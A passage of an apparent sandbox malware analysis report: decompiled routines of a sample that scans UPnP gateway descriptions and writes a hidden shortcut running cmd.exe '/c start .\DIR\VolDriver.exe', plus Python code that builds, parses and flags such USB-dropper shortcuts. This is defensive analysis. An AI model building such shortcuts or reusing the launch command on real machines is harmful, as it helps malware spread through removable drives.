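    """Drive the two flat searches down a description. `path` is a list of
    ("device", type) and ("service", type) steps; after each matched device
    the search continues in that device's <deviceList> and <serviceList>
    children, which is how a caller has to chain the flat scans. Returns
    the final matched element or None."""
    nodes = list(ET.fromstring(description))
    found = None
    for kind, wanted in path:
        found = find_device(nodes, wanted) if kind == "device" else find_service(nodes, wanted)
        if found is None:
            return None
        nodes = [n for lst in found if local_name(lst) in ("deviceList", "serviceList") for n in lst]
    return found


if __name__ == "__main__":
    svc = locate(SAMPLE_DESCRIPTION, [
        ("device", "urn:schemas-upnp-org:device:InternetGatewayDevice:1"),
        ("device", "urn:schemas-upnp-org:device:WANDevice:1"),
        ("device", "urn:schemas-upnp-org:device:WANConnectionDevice:1"),
        ("service", "urn:schemas-upnp-org:service:WANIPConnection:1"),
    ])
    print(child_text(svc, "controlURL"))
```

Because each scan is flat, a caller only reaches nested devices by chaining it through every deviceList, which locate() does; asking for the WANDevice at the root level returns nothing. The decompiled code's ownership discipline (Release every node except the one returned, SysFreeString every BSTR) has no counterpart here because Python manages the objects.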

                                                                                  C-Code - Quality: 89%
			/* Looks up, under the critical section at __eax+0x20, the list entry whose field
			   at +0x260 equals _a4; the list head is at __eax+0x38 and entries are linked
			   through +0x280. An _a4 of -1 (0xffffffff) is rejected up front. _t37 is the
			   found flag; when nothing matches, a fresh 0x284-byte entry is allocated with
			   E00408E40 (caller cleans 4 bytes of args). */
			E0040E330(intOrPtr __eax, void* _a4) {
				void* __esi;
				intOrPtr _t20;     /* current list entry */
				long _t28;
				long _t37;         /* 1 if an entry matching _a4 was found */
				intOrPtr _t45;     /* object passed in __eax */
				struct _CRITICAL_SECTION* _t48;
				long _t49;         /* newly allocated entry */
				void* _t53;        /* _a4 */
				void* _t54;
				void* _t55;

				_t53 = _a4;
				_t45 = __eax;
				if(_t53 != 0xffffffff) {
					_t48 = __eax + 0x20;
					_t37 = 0;
					EnterCriticalSection(_t48);
					_t20 =  *((intOrPtr*)(_t45 + 0x38));   /* list head */
					if(_t20 != 0) {
						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {   /* compare key field */
							_t20 =  *((intOrPtr*)(_t20 + 0x280));   /* next entry */
							if(_t20 != 0) {
								continue;
							} else {
							}
							goto L7;
						}
						_t37 = 1;   /* found */
					}
					L7:
					LeaveCriticalSection(_t48);
					if(_t37 == 0) {
						_t49 = E00408E40(0x284);   /* allocate a new entry */
						_t55 = _t54 + 4;
						if(_t49 == 0) {
                                                                                  							L13:
                                                                                  							E00409940(_t53);
                                                                                  							return _t49;
                                                                                  						} else {
                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                  							 *_t49 = 0x69636c69;
                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                  							_a4 = 0x10;
                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                  								E00408FB0(_t49);
                                                                                  								_t55 = _t55 + 4;
                                                                                  								_t49 = 0;
                                                                                  								goto L13;
                                                                                  							} else {
                                                                                  								_t28 = E0040C210();
                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                  								InitializeCriticalSection(_t14);
                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                  								E0040E250(_t49);
                                                                                  								return _t49;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						return 0;
                                                                                  					}
                                                                                  				} else {
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E83B,00000000), ref: 0040E34A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E83B,00000000), ref: 0040E36E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 25b9462c7ec89b53bcd70d4e63073bcbe0ea2bd8188f1567c139e1435a39efe3
                                                                                  • Instruction ID: 62d1bf2d84e0e1ba2e0a99c8f5ab924b94ee3ffd36670832191e74fbf46375e2
                                                                                  • Opcode Fuzzy Hash: 25b9462c7ec89b53bcd70d4e63073bcbe0ea2bd8188f1567c139e1435a39efe3
                                                                                  • Instruction Fuzzy Hash: F231D172201605ABC310ABB6EC48AD7B7E8FB44724F04893EF95DD3251DB39A4548B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CCD1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"deviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction ID: 6e690da79745c02a31a5bb20c3c2194b08e0ef47a7b2c4a2d0bea9277cba1ccd
                                                                                  • Opcode Fuzzy Hash: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction Fuzzy Hash: 5A31CA75A1020ADFCB04DF99D884BEFBBB5BF88304F108669E515B7390D778A981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CAF1() {
                                                                                   				void* _t85;

                                                                                   				/* Editor's note: the vtable offsets used below are consistent with MSXML's
                                                                                   				   IXMLDOMNodeList (+0x1c get_item) and IXMLDOMNode (+0xa4 get_baseName,
                                                                                   				   +0x68 get_text, +8 Release), and E0040C5B0(node, L"serviceType") reads as a
                                                                                   				   child-element lookup helper. This is inferred from the offsets and the two
                                                                                   				   lstrcmpiW calls; no symbols were recovered. __imp__#6 is OLEAUT32 ordinal 6,
                                                                                   				   SysFreeString (see the APIs list below). */
                                                                                   				L0:
                                                                                   				while(1) {
                                                                                   					L0:
                                                                                   					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;          /* index++ */
                                                                                   					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {         /* index >= list length */
                                                                                   						break;
                                                                                   					}
                                                                                   					L2:
                                                                                   					 *(_t85 - 0x10) = 0;
                                                                                   					_push(_t85 - 0x10);
                                                                                   					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                   					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                   					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {   /* list->get_item(index, &node) */
                                                                                   						L18:
                                                                                   						continue;
                                                                                   					} else {
                                                                                   						L4:
                                                                                   						 *(_t85 - 0x14) = 0;
                                                                                   						_push(_t85 - 0x14);
                                                                                   						_push( *(_t85 - 0x10));
                                                                                   						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {   /* node->get_baseName(&bstr) */
                                                                                   							L6:
                                                                                   							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {                  /* element named "service"? */
                                                                                   								L7:
                                                                                   								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"serviceType");   /* look up child "serviceType" */
                                                                                   								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                   									L8:
                                                                                   									 *(_t85 - 0x1c) = 0;
                                                                                   									_push(_t85 - 0x1c);
                                                                                   									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                   									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {   /* child->get_text(&bstr) */
                                                                                   										L10:
                                                                                   										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {     /* text equals the serviceType argument? */
                                                                                   											 *(_t85 - 8) =  *(_t85 - 0x10);                      /* keep this node (reference retained) */
                                                                                   										}
                                                                                   										L12:
                                                                                   										__imp__#6( *(_t85 - 0x1c));                             /* SysFreeString(text) */
                                                                                   									}
                                                                                   									L13:
                                                                                   									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));   /* child->Release() */
                                                                                   								}
                                                                                   							}
                                                                                   							L14:
                                                                                   							__imp__#6( *(_t85 - 0x14));                                     /* SysFreeString(name) */
                                                                                   						}
                                                                                   						L15:
                                                                                   						if( *(_t85 - 8) == 0) {
                                                                                   							L17:
                                                                                   							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));   /* node->Release(): no match, next item */
                                                                                   							goto L18;
                                                                                   						}
                                                                                   					}
                                                                                   					break;                                                                  /* matched: stop scanning */
                                                                                   				}
                                                                                   				L19:
                                                                                   				return  *(_t85 - 8);                                                        /* matching node or NULL */
                                                                                   			}





                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction ID: 5740a4334c3a4aa6fa35b80b2035fb24052f91dcc8a06d59cd48ed0533e674c8
                                                                                  • Opcode Fuzzy Hash: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction Fuzzy Hash: 5731EA74A0020ADFCB14CF99D885BEFB7B5BF88304F108669E515B7390D778A985CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                   			E00407CC0(signed int _a4, signed int _a8) {

                                                                                   				/* Editor's note: L0040F19E and L0040F198 are the CRT 64-bit shift helpers
                                                                                   				   _allshl and _aullshr (see the API ID below). They operate on edx:eax, which
                                                                                   				   the decompiler does not model, so each shift step survives here only as the
                                                                                   				   mask halves. The three steps (swap the 32-bit halves, then 16-bit words with
                                                                                   				   masks 0x0000ffff/0xffff0000, then bytes with 0x00ff00ff/0xff00ff00) are
                                                                                   				   consistent with a 64-bit byte-order swap of the _a8:_a4 pair; this is an
                                                                                   				   inference from the masks, not a recovered symbol. */
                                                                                   				L0040F19E();
                                                                                   				L0040F198();
                                                                                   				_a4 = _a4 | _a4;                                            /* (x << 32) | (x >> 32), low half */
                                                                                   				_a8 = _a8 | _a8;                                            /* high half */
                                                                                   				L0040F19E();
                                                                                   				L0040F198();
                                                                                   				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;                  /* 16-bit swap within each half */
                                                                                   				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                   				L0040F19E();
                                                                                   				L0040F198();
                                                                                   				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;                  /* byte swap within each word */
                                                                                   				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                   				return _a4;                                                 /* low dword in eax, high in edx (_a8) */
                                                                                   			}




                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction ID: 2c2ab6fddce176d3a51b6a04538834b606437382d20241cd374fb35f0ceee124
                                                                                  • Opcode Fuzzy Hash: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction Fuzzy Hash: B8111F32504518AB8B20EF5EC88268ABBD6EF84361B15C136FC2CDF759D634D9514BD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 54%
                                                                                   			E00404980(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                   				intOrPtr _v8;
                                                                                   				void* _v12;
                                                                                   				void* _v16;
                                                                                   				short _v540;
                                                                                   				char* _t37;
                                                                                   				intOrPtr _t42;

                                                                                   				/* Editor's note: the vtable offsets below match the IShellLinkW layout
                                                                                   				   (+0x2c SetArguments, +0x3c SetShowCmd, +0x44 SetIconLocation, +0x50 SetPath)
                                                                                   				   and, after the QueryInterface, IPersistFile (+0x18 Save). The CLSID/IID data
                                                                                   				   at 0x410348, 0x410338 and 0x410358 is not shown on this page, so the interface
                                                                                   				   names are inferred from the offsets and call order, not recovered symbols.
                                                                                   				   Net effect, if the inference holds: a shortcut saved to _a4 that launches
                                                                                   				   cmd.exe minimised with the "/c start .\<dir> & start .\<dir>\VolDriver.exe"
                                                                                   				   arguments (the directory name at 0x4140cc is not shown here). */
                                                                                   				__imp__CoInitialize(0);
                                                                                   				_t37 =  &_v12;
                                                                                   				__imp__CoCreateInstance(0x410348, 0, 1, 0x410338, _t37);       /* CLSCTX_INPROC_SERVER = 1 */
                                                                                   				_v8 = _t37;
                                                                                   				if(_v8 >= 0 && _v12 != 0) {
                                                                                   					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x4140cc, 0x4140cc);
                                                                                   					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");   /* +0x50: SetPath */
                                                                                   					_t42 =  *_v12;
                                                                                   					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                   					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);                       /* +0x44: SetIconLocation(path, index) */
                                                                                   					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);      /* +0x3c: SetShowCmd(7 = SW_SHOWMINNOACTIVE) */
                                                                                   					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);   /* +0x2c: SetArguments */
                                                                                   					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410358,  &_v16);   /* +0: QueryInterface(IID at 0x410358) */
                                                                                   					if(_v8 >= 0 && _v16 != 0) {
                                                                                   						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);   /* +0x18: IPersistFile::Save(_a4, fRemember = TRUE) */
                                                                                   						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);            /* Release */
                                                                                   					}
                                                                                   					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);     /* Release */
                                                                                   				}
                                                                                   				return _t37;
                                                                                   			}










                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0040498B
                                                                                  • CoCreateInstance.OLE32(00410348,00000000,00000001,00410338,?), ref: 004049A3
                                                                                  • wsprintfW.USER32 ref: 004049D6
                                                                                  Strings
                                                                                  • %windir%\System32\cmd.exe, xrefs: 004049DF
                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 004049CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                  • API String ID: 2038452267-2473591295
                                                                                  • Opcode ID: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction ID: 67ce22acd86be46554e689b187cabead6fbc8e336e1921382d0bb77877987f96
                                                                                  • Opcode Fuzzy Hash: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction Fuzzy Hash: F431BA75A40208EFCB04DF98C885EDEB7B5EF88704F108299E619A73A5D774AE81CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
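
Added example for the E00404980 routine above; this is not code from the sample, from Joe Sandbox or from any project the report names. If, as the vtable offsets and the SetShowCmd/Save ordering suggest, that routine writes a shortcut through IShellLink/IPersistFile, the artefact left on disk is an ordinary .lnk whose target is cmd.exe, whose arguments are "/c start .\<dir> & start .\<dir>\VolDriver.exe" and whose ShowCommand is 7. The block below builds such a file from the public MS-SHLLINK layout, parses it back and flags it; the directory name ("DIR") is a placeholder because the page does not show the string at 0x4140cc, and both sample shortcuts are constructed, not captured.

```python
"""Build, parse and flag .lnk files shaped like the one E00404980 appears to write.
Added example; the byte layout follows the public MS-SHLLINK specification."""
import struct
from pathlib import Path

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7   # 7 is the value the routine passes to SetShowCmd


def build_lnk(target: str, args: str, icon: str, show: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Minimal shortcut: header, empty IDList, LinkInfo with a LocalBasePath, arguments, icon."""
    flags = HAS_IDLIST | HAS_LINKINFO | HAS_ARGS | HAS_ICON | IS_UNICODE
    hdr = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                      0, 0, 0, 0, 0, show, 0, 0, 0, 0)            # 0x20 = FILE_ATTRIBUTE_ARCHIVE
    idlist = struct.pack("<H", 2) + b"\x00\x00"                   # IDListSize + TerminalID only
    volid = struct.pack("<IIII", 0x11, 2, 0, 0x10) + b"\x00"      # DriveType 2 = DRIVE_REMOVABLE, empty label
    base = target.encode("ascii") + b"\x00"                       # LocalBasePath (ANSI, NUL-terminated)
    body = volid + base + b"\x00"                                 # plus an empty CommonPathSuffix
    info = struct.pack("<IIIIIII", 0x1C + len(body), 0x1C, 1,     # LinkInfoFlags 1 = VolumeIDAndLocalBasePath
                       0x1C, 0x1C + len(volid), 0, 0x1C + len(volid) + len(base)) + body

    def sd(s: str) -> bytes:                                      # StringData: CountCharacters + UTF-16LE chars
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return hdr + idlist + info + sd(args) + sd(icon) + struct.pack("<I", 0)   # terminal ExtraData block


def parse_lnk(data: bytes) -> dict:
    """Read header fields, LocalBasePath and the StringData strings of a shell link."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    out = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0], "local_base_path": None}
    pos = 0x4C
    if flags & HAS_IDLIST:                                        # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        size, _hdr, iflags, _vol, base_off = struct.unpack_from("<IIIII", data, pos)
        if iflags & 1:                                            # VolumeIDAndLocalBasePath
            end = data.index(b"\x00", pos + base_off)
            out["local_base_path"] = data[pos + base_off:end].decode("latin-1")
        pos += size
    for bit, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                      (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        out[name] = None
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            out[name] = data[pos:pos + n * width].decode("utf-16-le" if width == 2 else "latin-1")
            pos += n * width
    return out


def lnk_looks_like_usb_dropper(lnk: dict) -> bool:
    """Heuristic for the pattern in E00404980: cmd.exe target, "/c ... start .\\" in the
    arguments, and a ShowCommand that keeps the console window out of sight."""
    args = (lnk.get("arguments") or "").lower()
    target = (lnk.get("local_base_path") or lnk.get("relative_path") or "").lower()
    return (target.endswith("cmd.exe") and "/c" in args and "start .\\" in args
            and lnk["show_command"] != SW_SHOWNORMAL)


def scan_for_dropper_links(root) -> list:
    """Walk a mounted volume (e.g. a USB stick) and return the .lnk files that match."""
    hits = []
    for p in Path(root).rglob("*.lnk"):
        try:
            if lnk_looks_like_usb_dropper(parse_lnk(p.read_bytes())):
                hits.append(p)
        except (ValueError, IndexError, OSError):
            continue                                              # not a parsable shell link
    return hits


# Constructed samples: one shaped like the routine's output ("DIR" stands in for the
# directory name the page does not show), one ordinary shortcut for comparison.
SAMPLE_LNK = build_lnk(r"C:\Windows\System32\cmd.exe",
                       r"/c start .\DIR & start .\DIR\VolDriver.exe",
                       r"%SystemRoot%\system32\shell32.dll")
BENIGN_LNK = build_lnk(r"C:\Windows\notepad.exe", "", "", show=SW_SHOWNORMAL)

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        info = parse_lnk(blob)
        verdict = "FLAGGED" if lnk_looks_like_usb_dropper(info) else "ok"
        print(f"{label}: {info['local_base_path']} {info['arguments']!r} show={info['show_command']} {verdict}")
```

On a live system, `scan_for_dropper_links(r"E:\")` over a removable drive is the practical entry point. The heuristic keys on three things that IShellLink::SetPath, SetArguments and SetShowCmd leave behind together: a cmd.exe target, a `start .\` relaunch of something in the same directory, and a ShowCommand other than SW_SHOWNORMAL (the spec only honours 1, 3 and 7, so 7 is the one value that minimises without activating). Shortcuts that only match one of the three are common in legitimate deployments; tune the rule to your environment.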

                                                                                  C-Code - Quality: 46%
                                                                                   			E004078B0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                   				signed int _v8;
                                                                                   				signed int _v12;

                                                                                   				/* Editor's note: L0040F19E is the CRT _allshl helper (see the API ID below),
                                                                                   				   which shifts edx:eax left by cl. The decompiler models neither the register
                                                                                   				   pair nor the shift counts, so each "cdq + _allshl" step appears here only as a
                                                                                   				   bare OR of the sign-extended argument. Six values, each widened to 64 bits,
                                                                                   				   shifted and ORed into _v8:_v12 is consistent with packing six fields into one
                                                                                   				   64-bit value; this is an inference, not a recovered symbol. */
                                                                                   				asm("cdq");                                                  /* sign-extend _a4 into edx:eax */
                                                                                   				L0040F19E();                                                 /* _allshl */
                                                                                   				asm("cdq");
                                                                                   				L0040F19E();
                                                                                   				asm("cdq");
                                                                                   				L0040F19E();
                                                                                   				asm("cdq");
                                                                                   				L0040F19E();
                                                                                   				asm("cdq");
                                                                                   				L0040F19E();
                                                                                   				asm("cdq");
                                                                                   				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;                /* low dword of the packed value */
                                                                                   				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;         /* high dword */
                                                                                   				return _v12;                                                 /* returned in edx:eax */
